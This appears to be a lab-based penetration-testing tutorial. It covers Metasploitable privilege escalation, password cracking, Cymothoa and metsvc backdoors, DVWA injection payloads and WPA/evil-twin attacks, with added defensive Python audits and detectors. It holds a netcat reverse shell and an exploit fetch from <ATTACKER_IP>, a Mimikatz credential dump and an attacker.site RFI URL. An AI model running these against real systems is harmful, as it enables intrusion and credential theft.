Fading Coder

Techniques for Privilege Escalation and Maintaining Access in Penetration Testing

After successfully exploiting a target system, the initial access level is often limited, typically matching the privileges of the compromised service account (e.g., www-data for a web server). This chapter details methods to elevate these privileges and establish persistent access mechanisms to ensure continued control over the target system.

Privilege Escalation

Privilege escalation involves exploiting vulnerabilities to gain higher-level access on a system. Two primary types exist:

  • Vertical Escalation: A lower-privileged user gains access to functions intended for higher-privileged users (e.g., a CMS user accessing admin functions).
  • Horizontal Escalation: A standard user accesses functions intended for another user at the same privilege level (e.g., User A accessing User B's banking menu).

Common vectors include local exploits, configuration errors (e.g., accessible SSH keys), weak passwords, credential sniffing, and packet spoofing.
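The two escalation classes above are, at the application level, missing authorization checks. The following is an added example (not code from the original post) that shows each class as a bug in a toy banking API beside the corrected handler; the users, roles and account data are constructed for the demo.

```python
# Added example, not code from the original post: the two escalation classes
# shown as authorization bugs in a toy banking API, beside the corrected
# handlers. Users, roles and account data are constructed for the demo.
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str          # "user" or "admin"


class Forbidden(Exception):
    """Raised when an authorization check fails."""


# Constructed data: account id -> (owner, balance)
ACCOUNTS = {
    "acct-1": ("alice", 120.0),
    "acct-2": ("bob", 75.0),
}


def view_account_vulnerable(requester: User, account_id: str) -> float:
    """Horizontal escalation: any logged-in user can read any account,
    because the handler never compares the account owner with the requester."""
    return ACCOUNTS[account_id][1]


def delete_user_vulnerable(requester: User, target: str) -> str:
    """Vertical escalation: an admin-only action reachable by a normal user,
    because the handler never checks the caller's role."""
    return f"deleted {target}"


def view_account(requester: User, account_id: str) -> float:
    """Object-level authorization: only the owner or an admin may read it."""
    owner, balance = ACCOUNTS[account_id]
    if requester.role != "admin" and requester.name != owner:
        raise Forbidden(f"{requester.name} may not read {account_id}")
    return balance


def delete_user(requester: User, target: str) -> str:
    """Function-level authorization: the admin role is required."""
    if requester.role != "admin":
        raise Forbidden(f"{requester.name} may not delete users")
    return f"deleted {target}"


def outcome(handler, requester: User, arg: str) -> str:
    """Run a handler and report 'allowed' or 'denied' for comparison."""
    try:
        handler(requester, arg)
        return "allowed"
    except Forbidden:
        return "denied"


def demo() -> dict:
    alice = User("alice", "user")
    admin = User("root", "admin")
    return {
        "horizontal_vulnerable": outcome(view_account_vulnerable, alice, "acct-2"),
        "horizontal_fixed": outcome(view_account, alice, "acct-2"),
        "owner_still_works": outcome(view_account, alice, "acct-1"),
        "vertical_vulnerable": outcome(delete_user_vulnerable, alice, "bob"),
        "vertical_fixed": outcome(delete_user, alice, "bob"),
        "admin_still_works": outcome(delete_user, admin, "bob"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check:24} {result}")
```

The fixed handlers make the check explicit at the point of use: an object-level check (who owns the thing) for the horizontal case and a role check for the vertical case. Both are what a tester is probing for when a CMS user reaches admin functions or User A reaches User B's menu.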

Local Privilege Escalation via Exploit

This demonstration uses Metasploitable 2 as the target and Kali Linux as the attacker.

  1. Service Identification: Scan the target (172.16.43.156) to identify open services.
    nmap -p- 172.16.43.156
    
  2. Vulnerability Research: Research reveals the distccd service (used for distributed compilation) is vulnerable to remote command execution.
  3. Exploitation with Metasploit: Search for and execute the relevant exploit.
    msfconsole
    search distccd
    use exploit/unix/misc/distcc_exec
    set RHOSTS 172.16.43.156
    exploit
    
    Successful exploitation yields a shell with daemon user privileges.
  4. Information Gathering: Check the kernel version to find a suitable local privilege escalation exploit.
    uname -r
    # Output: 2.6.24-16-server
    
  5. Exploit Transfer: An exploit for the udev service (CVE-2009-1185) is identified (exploit-db.com/exploits/8572). Copy it to a web-accessible directory on the attacker machine and start a web server.
    cp /usr/share/exploitdb/platforms/linux/local/8572.c /var/www/html/
    service apache2 start
    
  6. Download and Compile on Target: From the compromised shell, download and compile the exploit.
    wget http://<ATTACKER_IP>/8572.c
    gcc 8572.c -o priv_esc_exploit
    
  7. Exploit Preparation: The exploit requires the PID of the udevd netlink socket. Find it and prepare a reverse shell payload.
    cat /proc/net/netlink
    # Or: ps aux | grep udev
    echo '#!/bin/sh' > /tmp/revshell
    echo '/bin/netcat -e /bin/sh <ATTACKER_IP> 4444' >> /tmp/revshell
    chmod +x /tmp/revshell
    
  8. Listener Setup and Execution: On the attacker machine, start a Netcat listener, then run the exploit on the target with the found PID.
    nc -lvp 4444
    # On target:
    ./priv_esc_exploit <UDEV_PID>
    
  9. Result: The Netcat listener receives a connection, and issuing the whoami command confirms root access.

Password Attack Tools

Password-based authentication remains widespread. Testing password strength is a critical part of penetration testing.

Offline Attack Tools

These tools crack password hashes after they have been obtained from the target (e.g., from /etc/shadow, database dumps).

John the Ripper

A fast, versatile password cracker supporting many hash types.

  1. Preparing Hashes: On Unix-like systems, combine /etc/passwd and /etc/shadow.
    unshadow /etc/passwd /etc/shadow > combined_hashes.txt
    
  2. Cracking: Run John using its default cracking modes (single, wordlist, incremental).
    john combined_hashes.txt
    
  3. Viewing Results:
    john --show combined_hashes.txt
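Before pointing a cracker at a shadow file, it is worth knowing what is in it: empty password fields and legacy DES or MD5-crypt hashes fall immediately. The following is an added example (not code from the original post) with a small parser for /etc/shadow-format lines that classifies each password field by its crypt(3) prefix and flags the weak ones; the sample lines and hash strings are constructed placeholders.

```python
# Added example, not code from the original post: a small parser for
# /etc/shadow-format lines that flags the password fields a cracker would
# get to first (empty fields, DES and MD5-crypt hashes). The sample lines
# and hash values are constructed; the prefix table follows crypt(3) naming.
import re

# crypt(3) hash identifiers -> (algorithm, verdict). Traditional DES hashes
# have no prefix: exactly 13 characters from the set [./0-9A-Za-z].
PREFIXES = {
    "$1$": ("md5crypt", "weak"),
    "$2a$": ("bcrypt", "ok"),
    "$2b$": ("bcrypt", "ok"),
    "$2y$": ("bcrypt", "ok"),
    "$5$": ("sha256crypt", "ok"),
    "$6$": ("sha512crypt", "ok"),
    "$7$": ("scrypt", "ok"),
    "$y$": ("yescrypt", "ok"),
}
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def classify(field: str) -> tuple[str, str]:
    """Return (algorithm, verdict) for one password field."""
    if field == "":
        return ("none", "critical")      # empty field: login without any password
    if field.startswith(("!", "*")):
        return ("locked", "ok")          # locked or no-login account
    for prefix, info in PREFIXES.items():
        if field.startswith(prefix):
            return info
    if DES_RE.match(field):
        return ("descrypt", "weak")      # 8-character limit, trivial to brute-force
    return ("unknown", "review")


def audit_shadow(text: str) -> list[tuple[int, str, str, str]]:
    """Return (line number, user, algorithm, verdict) for every non-ok entry."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            findings.append((lineno, "?", "malformed", "review"))
            continue
        algo, verdict = classify(parts[1])
        if verdict != "ok":
            findings.append((lineno, parts[0], algo, verdict))
    return findings


# Constructed sample; the hash strings are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$6$saltsalt$Fak3Sha512HashValueForTheDemoOnly:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
legacy:$1$abcdefgh$Fak3Md5CryptValue:19000:0:99999:7:::
old:AbCdEfGhIjKlM:19000:0:99999:7:::
svc::19000:0:99999:7:::
"""

if __name__ == "__main__":
    for lineno, user, algo, verdict in audit_shadow(SAMPLE_SHADOW):
        print(f"line {lineno}: {user}: {algo} ({verdict})")
```

Run against the unshadow output from step 1, the same audit tells you which accounts John will crack in seconds regardless of password quality, which is the finding to report first.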
    

Ophcrack

A rainbow-table-based cracker, effective against Windows LM/NTLM hashes. It requires precomputed tables (e.g., tables_xp_free_fast).

ophcrack-cli -d /path/to/tables/ -t xp_free_fast -f extracted_hashes.txt

samdump2

Extracts Windows password hashes from the SYSTEM and SAM registry files without needing the SysKey.

samdump2 SYSTEM.bak SAM.bak -o win_hashes.txt

Online Attack Tools

These tools perform authentication attempts directly against a network service (e.g., SSH, FTP, VNC).

CeWL (Custom Word List Generator)

Generates a unique wordlist by spidering a target website.

cewl -w custom_wordlist.txt -d 2 http://target.site

Hydra

A fast, parallelized network login cracker.

# Example: Brute-force VNC password
hydra -P passwords.txt 192.168.1.10 vnc

Mimikatz (within Metasploit)

A post-exploitation tool for credential extraction from Windows memory.

meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::logonPasswords

Maintaining Access

Establishing persistence ensures access remains even if the initial vulnerability is patched.

OS-Level Backdoors

Cymothoa

Injects shellcode into an existing process, hiding the backdoor within a legitimate process.

# Find PID to inject into (e.g., a stable process like sshd)
ps aux | grep sshd
# Inject shellcode (payload 1 binds to port 4444)
cymothoa -p <PID> -s 1 -y 4444

Connect to the backdoor: nc -nv <TARGET_IP> 4444.

Meterpreter Persistence (metsvc)

Creates a persistent backdoor service via Metasploit.

meterpreter > run metsvc
# Later, connect using the multi/handler with the metsvc payload

Remove with: meterpreter > run metsvc -r.
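Both backdoors above leave a listening socket behind, either inside an existing process (Cymothoa) or as a new service. The following is an added example (not code from the original post) of a listener audit that parses `ss -lntp` output and compares it against a baseline of expected services; the ss output, the baseline and the use of port 4444 from this page's Cymothoa example are constructed assumptions.

```python
# Added example, not code from the original post: a listener audit that
# compares the output of `ss -lntp` against a baseline of expected services,
# so a backdoor bound inside an existing process (the Cymothoa case above) or
# a new listening port shows up in a routine check. The ss output below is
# constructed; port 4444 (this page's example) and the baseline are assumptions.
import re

PROC_RE = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')

# Assumed baseline for the host: port -> process expected to own it.
BASELINE = {22: "sshd", 80: "apache2"}


def parse_ss(text: str) -> list[dict]:
    """Parse `ss -lntp` lines into {port, addr, name, pid} records."""
    sockets = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue               # header, blank, or non-listening row
        addr, port = cols[3].rsplit(":", 1)
        m = PROC_RE.search(line)
        sockets.append({
            "port": int(port),
            "addr": addr,
            "name": m["name"] if m else None,
            "pid": int(m["pid"]) if m else None,
        })
    return sockets


def audit_listeners(sockets: list[dict], baseline: dict) -> list[dict]:
    """Flag listeners that are not in the baseline, or whose owner differs."""
    expected_pids = {s["pid"] for s in sockets if baseline.get(s["port"]) == s["name"]}
    findings = []
    for s in sockets:
        expected = baseline.get(s["port"])
        if expected == s["name"]:
            continue
        reason = "port not in baseline" if expected is None else f"expected {expected}"
        if s["pid"] in expected_pids:
            # Same pid as a known-good service: consistent with code injected into it.
            reason += "; socket owned by a pid that also serves a baseline port"
        findings.append({**s, "reason": reason})
    return findings


# Constructed sample: sshd (pid 811) owns its normal port and an extra one.
SAMPLE_SS = """\
State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port  Process
LISTEN  0       128            0.0.0.0:22          0.0.0.0:*      users:(("sshd",pid=811,fd=3))
LISTEN  0       511                  *:80                *:*      users:(("apache2",pid=902,fd=4))
LISTEN  0       1              0.0.0.0:4444        0.0.0.0:*      users:(("sshd",pid=811,fd=7))
"""

if __name__ == "__main__":
    for f in audit_listeners(parse_ss(SAMPLE_SS), BASELINE):
        print(f"port {f['port']} ({f['name']}, pid {f['pid']}): {f['reason']}")
```

The second signal (a baseline process owning a port it should not) is the one that matters for injected shellcode: the process name looks legitimate, so a check that only compares names against an allowlist would miss it.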

Web Application Testing

Web apps are a primary attack vector. Testing involves reconnaissance, vulnerability scanning, and exploitation.

Reconnaissance & Scanning

Nikto

A web server scanner that checks for dangerous files, outdated versions, and configuration issues.

nikto -h http://target.site -p 80

OWASP ZAP

An integrated penetration testing tool for finding vulnerabilities in web applications.

owasp-zap

Burp Suite

A comprehensive platform for web security testing (Proxy, Spider, Scanner, Intruder, Repeater).

burpsuite

Exploitation Techniques

Cross-Site Scripting (XSS)

Reflected XSS Test (DVWA):

<script>alert('XSS Test');</script>

Stored XSS Test: Inject a script into a comment or message field that executes for all visitors.

<script>alert(document.cookie);</script>

SQL Injection

Manual Testing (DVWA):

' OR '1'='1
' UNION SELECT null, user() #
' UNION SELECT null, table_name FROM information_schema.tables #

Automated with sqlmap:

sqlmap -u "http://target.site/page.php?id=1" --cookie="sessionid=abc123" --dbs
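The manual payloads above work because user input is spliced into the statement text. The following is an added example (not code from the original post) that reproduces the login bypass and the UNION data leak against an in-memory SQLite table and shows the parameterized queries that defeat them; the table contents are constructed, and the UNION payload is respelled for SQLite, which has no `user()` function and uses `--` rather than `#` for comments.

```python
# Added example, not code from the original post: the login bypass and the
# UNION data leak from the manual payloads above, reproduced against an
# in-memory SQLite table, beside the parameterized versions that defeat them.
# Table contents are constructed for the demo.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "correct-horse"), ("alice", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    # Input is concatenated into the statement, so quotes in it change the grammar.
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    # Bound parameters are always data; the statement's structure is fixed.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def find_user_vulnerable(conn, name: str) -> list[str]:
    sql = f"SELECT username FROM users WHERE username = '{name}'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, name: str) -> list[str]:
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


BYPASS = "' OR '1'='1"                          # the page's first payload
LEAK = "' UNION SELECT password FROM users --"  # SQLite spelling of the UNION payload


def demo() -> dict:
    conn = make_db()
    return {
        "bypass_vulnerable": login_vulnerable(conn, "admin", BYPASS),
        "bypass_safe": login_safe(conn, "admin", BYPASS),
        "real_login_safe": login_safe(conn, "alice", "hunter2"),
        "leak_vulnerable": sorted(find_user_vulnerable(conn, LEAK)),
        "leak_safe": find_user_safe(conn, LEAK),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check:18} {result}")
```

With the vulnerable login the WHERE clause becomes `username = 'admin' AND password = '' OR '1'='1'`, which is always true; the safe version sends the same string as a bound value and matches nothing. Sqlmap automates exactly this kind of probing, which is why parameterized queries, not input filtering, are the fix to recommend.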

Command Injection, Directory Traversal, File Inclusion

Command Injection (DVWA):

127.0.0.1; whoami
127.0.0.1; cat /etc/passwd

Directory Traversal / Local File Inclusion (LFI):

../../../../etc/passwd

Remote File Inclusion (RFI):

http://attacker.site/malicious.txt
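Every payload class in this section leaves a recognisable trace in the web server's access log. The following is an added example (not code from the original post) of detection logic that runs signatures for XSS, SQL injection, command injection, traversal/LFI and RFI over Apache combined-format log lines; the log lines are constructed to mirror the DVWA requests above, and the signatures are illustrative rather than a complete ruleset.

```python
# Added example, not code from the original post: detection logic that runs
# the payload classes from this section (XSS, SQLi, command injection,
# traversal/LFI, RFI) as signatures over web server access-log lines. The log
# lines are constructed in Apache combined format; the signatures are
# illustrative, not a complete ruleset.
import re
from urllib.parse import unquote_plus

RULES = [
    ("xss", re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.I)),
    ("sqli", re.compile(
        r"\b(or|and)\b\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+"   # ' OR '1'='1
        r"|union\s+(all\s+)?select"                        # UNION SELECT ...
        r"|information_schema", re.I)),
    # Shell metacharacter followed by a common command; the lookahead avoids
    # flagging ordinary parameters such as "&id=5".
    ("cmdi", re.compile(r"[;|&`]\s*(whoami|id|cat|uname|nc|wget|curl)(?![\w=])", re.I)),
    ("traversal", re.compile(r"(\.\./){2,}|/etc/(passwd|shadow)", re.I)),
    ("rfi", re.compile(r"[?&]\w+=(https?|ftp)://", re.I)),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def scan_request(path: str) -> list[str]:
    """Return the names of all rules that match the (decoded) request path."""
    decoded = unquote_plus(unquote_plus(path))   # second pass catches double-encoded payloads
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text: str) -> list[dict]:
    """Return one record per flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = scan_request(m["path"])
        if tags:
            hits.append({"ip": m["ip"], "path": m["path"], "status": int(m["status"]), "tags": tags})
    return hits


# Constructed sample traffic against a DVWA-style host.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 1042
10.0.0.7 - - [12/Mar/2024:10:00:09 +0000] "GET /vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27XSS+Test%27%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2210
10.0.0.7 - - [12/Mar/2024:10:00:15 +0000] "GET /vulnerabilities/sqli/?id=%27+OR+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 3050
10.0.0.7 - - [12/Mar/2024:10:00:21 +0000] "GET /vulnerabilities/sqli/?id=%27+UNION+SELECT+null%2C+user%28%29+%23 HTTP/1.1" 200 2980
10.0.0.7 - - [12/Mar/2024:10:00:30 +0000] "GET /vulnerabilities/exec/?ip=127.0.0.1%3B+whoami&Submit=Submit HTTP/1.1" 200 1900
10.0.0.7 - - [12/Mar/2024:10:00:44 +0000] "GET /vulnerabilities/fi/?page=../../../../etc/passwd HTTP/1.1" 200 2600
10.0.0.7 - - [12/Mar/2024:10:00:52 +0000] "GET /vulnerabilities/fi/?page=http://attacker.site/malicious.txt HTTP/1.1" 500 310
10.0.0.9 - - [12/Mar/2024:10:01:00 +0000] "POST /login.php HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["tags"], hit["path"])
```

Decoding before matching is the important step: the same payloads arrive percent-encoded (and sometimes double-encoded) and would slip past signatures applied to the raw path. POST bodies are not in the access log at all, so this only covers GET-style injection; a WAF or application-level logging is needed for the rest.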

Wireless Penetration Testing

Reconnaissance

Kismet

A wireless network detector, sniffer, and IDS.

kismet

Aircrack-ng Suite

A complete suite for wireless network auditing.

  1. Set interface to monitor mode:
    airmon-ng start wlan0
    
  2. Scan for networks:
    airodump-ng wlan0mon
    

Attacking WPA/WPA2

  1. Capture the 4-way handshake:
    airodump-ng -c <CHANNEL> --bssid <BSSID> -w capture wlan0mon
    
  2. Deauthenticate a client (if needed) to force re-authentication:
    aireplay-ng -0 3 -a <BSSID> -c <CLIENT_MAC> wlan0mon
    
  3. Crack the handshake with a wordlist:
    aircrack-ng -w rockyou.txt -b <BSSID> capture-01.cap
    

Rogue Access Point (Evil Twin)

  1. Create a fake AP with the same SSID:
    airbase-ng -e "Target WiFi" -c <CHANNEL> wlan0mon
    
  2. Configure DHCP and DNS (dnsmasq) to serve clients.
  3. Capture credentials or conduct further MitM attacks.

Post-Connection Activities

  • MAC Address Spoofing (to bypass MAC filtering):
    macchanger -m <SPOOFED_MAC> wlan0
    
  • Sniffing Traffic (with Wireshark, after providing the WPA key in Wireshark's 802.11 protocol settings).
  • Attacking the Router's admin interface using default or cracked credentials.
